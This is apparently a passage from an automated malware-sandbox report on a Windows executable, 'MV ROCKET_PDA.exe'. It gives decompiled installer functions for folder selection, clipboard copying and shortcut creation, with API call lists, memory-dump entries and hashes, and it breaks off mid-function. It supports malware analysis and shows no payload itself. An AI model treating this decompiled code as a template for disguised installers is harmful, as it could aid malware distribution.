                                                                                            0x00405368
                                                                                            0x00405368
                                                                                            0x00000000
                                                                                            0x004052d2
                                                                                            0x00405202
                                                                                            0x00405208
                                                                                            0x00405238
                                                                                            0x0040523a
                                                                                            0x00405240
                                                                                            0x0040524b
                                                                                            0x0040524b
                                                                                            0x00405252
                                                                                            0x00000000
                                                                                            0x00405252
                                                                                            0x0040520c
                                                                                            0x00405216
                                                                                            0x00000000
                                                                                            0x004051dd
                                                                                            0x004051dd
                                                                                            0x004051e3
                                                                                            0x0040521b
                                                                                            0x00000000
                                                                                            0x00405224
                                                                                            0x004051ec
                                                                                            0x004051f1
                                                                                            0x004051f4
                                                                                            0x00000000
                                                                                            0x004051f4
                                                                                            0x004051db
                                                                                            0x00405012
                                                                                            0x00405016
                                                                                            0x0040501f
                                                                                            0x00405026
                                                                                            0x00405029
                                                                                            0x0040502c
                                                                                            0x0040502f
                                                                                            0x00405030
                                                                                            0x00405031
                                                                                            0x0040504a
                                                                                            0x0040504d
                                                                                            0x00405057
                                                                                            0x00405066
                                                                                            0x0040506e
                                                                                            0x00405076
                                                                                            0x0040507b
                                                                                            0x0040507e
                                                                                            0x0040508a
                                                                                            0x00405093
                                                                                            0x0040509c
                                                                                            0x004050bf
                                                                                            0x004050c5
                                                                                            0x004050d6
                                                                                            0x004050db
                                                                                            0x004050e9
                                                                                            0x004050f7
                                                                                            0x004050f7
                                                                                            0x004050fc
                                                                                            0x0040510a
                                                                                            0x0040510a
                                                                                            0x0040510f
                                                                                            0x00405112
                                                                                            0x00405117
                                                                                            0x00405123
                                                                                            0x0040512c
                                                                                            0x00405139
                                                                                            0x00405148
                                                                                            0x0040513b
                                                                                            0x00405140
                                                                                            0x00405140
                                                                                            0x00405154
                                                                                            0x00405154
                                                                                            0x00405168
                                                                                            0x00405171
                                                                                            0x0040517a
                                                                                            0x0040518a
                                                                                            0x00405196
                                                                                            0x00405196
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00405050
                                                                                            • GetDlgItem.USER32 ref: 0040505F
                                                                                            • GetClientRect.USER32 ref: 0040509C
                                                                                            • GetSystemMetrics.USER32 ref: 004050A4
                                                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                            • GetDlgItem.USER32 ref: 00405161
                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                            • GetDlgItem.USER32 ref: 0040506E
                                                                                              • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                            • GetDlgItem.USER32 ref: 004051B3
                                                                                            • CreateThread.KERNEL32 ref: 004051C1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                            • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                            • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                                                            • ShowWindow.USER32(00000008), ref: 00405238
                                                                                            • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                                                            • CreatePopupMenu.USER32 ref: 0040527B
                                                                                            • AppendMenuA.USER32 ref: 00405290
                                                                                            • GetWindowRect.USER32 ref: 004052A3
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                            • GlobalLock.KERNEL32 ref: 0040532B
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                            • SetClipboardData.USER32 ref: 00405362
                                                                                            • CloseClipboard.USER32 ref: 00405368
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                            • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                            • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                            • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x51901c
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x5137d0
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                            0x004042c1
                                                                                            0x004042c7
                                                                                            0x004042cd
                                                                                            0x004042da
                                                                                            0x004042e8
                                                                                            0x004042eb
                                                                                            0x004042f3
                                                                                            0x004042f9
                                                                                            0x004042f9
                                                                                            0x00404305
                                                                                            0x00404308
                                                                                            0x00404376
                                                                                            0x0040437d
                                                                                            0x00404454
                                                                                            0x0040445b
                                                                                            0x0040446a
                                                                                            0x0040446a
                                                                                            0x0040446e
                                                                                            0x00404478
                                                                                            0x00404485
                                                                                            0x00404487
                                                                                            0x00404487
                                                                                            0x00404495
                                                                                            0x0040449c
                                                                                            0x004044a3
                                                                                            0x004044a6
                                                                                            0x004044dd
                                                                                            0x004044df
                                                                                            0x004044e5
                                                                                            0x004044ea
                                                                                            0x004044ee
                                                                                            0x004044f0
                                                                                            0x004044f0
                                                                                            0x0040450c
                                                                                            0x00000000
                                                                                            0x0040450e
                                                                                            0x00404511
                                                                                            0x0040451f
                                                                                            0x00404525
                                                                                            0x00404526
                                                                                            0x00404529
                                                                                            0x0040452c
                                                                                            0x00000000
                                                                                            0x0040452c
                                                                                            0x004044a8
                                                                                            0x004044aa
                                                                                            0x004044ae
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044b0
                                                                                            0x004044b0
                                                                                            0x004044bd
                                                                                            0x004044c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044c6
                                                                                            0x004044c8
                                                                                            0x004044c8
                                                                                            0x004044d3
                                                                                            0x004044d6
                                                                                            0x004044db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004044db
                                                                                            0x00404538
                                                                                            0x00404542
                                                                                            0x00404545
                                                                                            0x00404548
                                                                                            0x0040454f
                                                                                            0x0040454f
                                                                                            0x00404551
                                                                                            0x00404551
                                                                                            0x00404556
                                                                                            0x00404558
                                                                                            0x00404560
                                                                                            0x00404567
                                                                                            0x00404569
                                                                                            0x00404574
                                                                                            0x00404574
                                                                                            0x00404569
                                                                                            0x0040457b
                                                                                            0x00404584
                                                                                            0x0040458e
                                                                                            0x00404596
                                                                                            0x004045b1
                                                                                            0x00404598
                                                                                            0x004045a1
                                                                                            0x004045a1
                                                                                            0x00404596
                                                                                            0x004045b6
                                                                                            0x004045bb
                                                                                            0x004045c0
                                                                                            0x004045c9
                                                                                            0x004045c9
                                                                                            0x004045d2
                                                                                            0x004045d4
                                                                                            0x004045d4
                                                                                            0x004045e0
                                                                                            0x004045e8
                                                                                            0x004045f2
                                                                                            0x004045f2
                                                                                            0x004045f7
                                                                                            0x00000000
                                                                                            0x004045f7
                                                                                            0x004044a6
                                                                                            0x0040445d
                                                                                            0x00404464
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404464
                                                                                            0x00404383
                                                                                            0x0040438c
                                                                                            0x004043a6
                                                                                            0x004043ab
                                                                                            0x004043b5
                                                                                            0x004043bc
                                                                                            0x004043c8
                                                                                            0x004043cb
                                                                                            0x004043ce
                                                                                            0x004043d5
                                                                                            0x004043dd
                                                                                            0x004043e0
                                                                                            0x004043e4
                                                                                            0x004043eb
                                                                                            0x004043f3
                                                                                            0x0040444d
                                                                                            0x004043f5
                                                                                            0x004043f6
                                                                                            0x004043fd
                                                                                            0x00404402
                                                                                            0x00404407
                                                                                            0x0040440f
                                                                                            0x0040441c
                                                                                            0x00404430
                                                                                            0x00404434
                                                                                            0x00404434
                                                                                            0x00404430
                                                                                            0x00404439
                                                                                            0x00404446
                                                                                            0x00404446
                                                                                            0x004043f3
                                                                                            0x00000000
                                                                                            0x004043ab
                                                                                            0x00404399
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040439f
                                                                                            0x00000000
                                                                                            0x0040430a
                                                                                            0x00404317
                                                                                            0x00404320
                                                                                            0x0040432d
                                                                                            0x0040432d
                                                                                            0x00404334
                                                                                            0x0040433a
                                                                                            0x00404343
                                                                                            0x00404346
                                                                                            0x00404349
                                                                                            0x00404351
                                                                                            0x00404354
                                                                                            0x00404357
                                                                                            0x0040435d
                                                                                            0x00404364
                                                                                            0x0040436b
                                                                                            0x004045fd
                                                                                            0x0040460f
                                                                                            0x00404371
                                                                                            0x00404374
                                                                                            0x00000000
                                                                                            0x00404374
                                                                                            0x0040436b

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404310
                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                            • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                            • lstrcmpiA.KERNEL32(gqeqcda,0042A0A0,00000000,?,?), ref: 00404428
                                                                                            • lstrcatA.KERNEL32(?,gqeqcda), ref: 00404434
                                                                                            • SetDlgItemTextA.USER32 ref: 00404446
                                                                                              • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                              • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                              • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                              • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                              • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                              • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$gqeqcda
                                                                                            • API String ID: 2624150263-2210883770
                                                                                            • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                            • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                            • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                            • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41CC0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 72E41D81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreate
                                                                                            • String ID: Finished Navigation$Moniker %p$hlink %p, flags %#x, user_bind_ctx %p, bind_callback %p, browse_ctx %p.$open$LOu
                                                                                            • API String ID: 170202629-706759311
                                                                                            • Opcode ID: e05ac16352b8b975d126b13c23e0f5c89c04ef7b815df8decd17bdefc1a54c54
                                                                                            • Instruction ID: 32d58e13fdf7eb1a3d8f343a2fb88392c1431197b2329718d78def98934abadb
                                                                                            • Opcode Fuzzy Hash: e05ac16352b8b975d126b13c23e0f5c89c04ef7b815df8decd17bdefc1a54c54
                                                                                            • Instruction Fuzzy Hash: 4F814FF5E01209EBDB04CF98E881FAF7BB5EF48309F109568F9056B240DB75AA51CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E416D0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 72E4177B
                                                                                            • MkParseDisplayName.OLE32(00000000,00000000,?,00000003), ref: 72E417A4
                                                                                            • wcschr.MSVCRT ref: 72E417C5
                                                                                            Strings
                                                                                            • couldn't create moniker for %s, failed with error 0x%08x, xrefs: 72E41820
                                                                                            • (%p)->(%i %s %s), xrefs: 72E41707
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreateDisplayNameParsewcschr
                                                                                            • String ID: (%p)->(%i %s %s)$couldn't create moniker for %s, failed with error 0x%08x
                                                                                            • API String ID: 207029327-3509610628
                                                                                            • Opcode ID: 5116ad03bd748d601af7feade2401b28e3e57e6267718fd5aed23816c5a51295
                                                                                            • Instruction ID: c992699be6d3ad9d6c8ca79f9d6528355f55e149f3be2d42c41d252254dc3210
                                                                                            • Opcode Fuzzy Hash: 5116ad03bd748d601af7feade2401b28e3e57e6267718fd5aed23816c5a51295
                                                                                            • Instruction Fuzzy Hash: 2C5141B5D01208EFDF04CF98E844BAE77B9EB48309F10D968F9169B240DB35EA55CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41930, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateBindCtx.OLE32(00000000,00000000), ref: 72E419DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: BindCreate
                                                                                            • String ID: (%p) -> (%i %p %p)$(Target: %s Location: %s)$<NULL>$<NULL>
                                                                                            • API String ID: 170202629-2214727062
                                                                                            • Opcode ID: f193489b3473e3c0fd78de4b03c111a7e5b916ed99937266a4af2a6300f69995
                                                                                            • Instruction ID: 910e7e06006239d0a179ff82227ecc4b39024949a26258e2ae85cdffdf1607ec
                                                                                            • Opcode Fuzzy Hash: f193489b3473e3c0fd78de4b03c111a7e5b916ed99937266a4af2a6300f69995
                                                                                            • Instruction Fuzzy Hash: 914142F5900209DBDF05CF98F844BAF77B9AB44308F20A559F9165B390DB35EA50CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41590, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (%p)->(%i %p %s)
                                                                                            • API String ID: 0-2922217910
                                                                                            • Opcode ID: c54f50d8fc557eac088c36a1e93980fbe9de865e670ca66beb7b8a7f72b8cd1e
                                                                                            • Instruction ID: 6e98c557c716081905a21d6f952292c6c34292e302179a58187b2bfd8066c0f6
                                                                                            • Opcode Fuzzy Hash: c54f50d8fc557eac088c36a1e93980fbe9de865e670ca66beb7b8a7f72b8cd1e
                                                                                            • Instruction Fuzzy Hash: 34415DB5E00108EBDF04CF98E845B9E77BAEB44308F20D598F8069B241DB31EB51CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
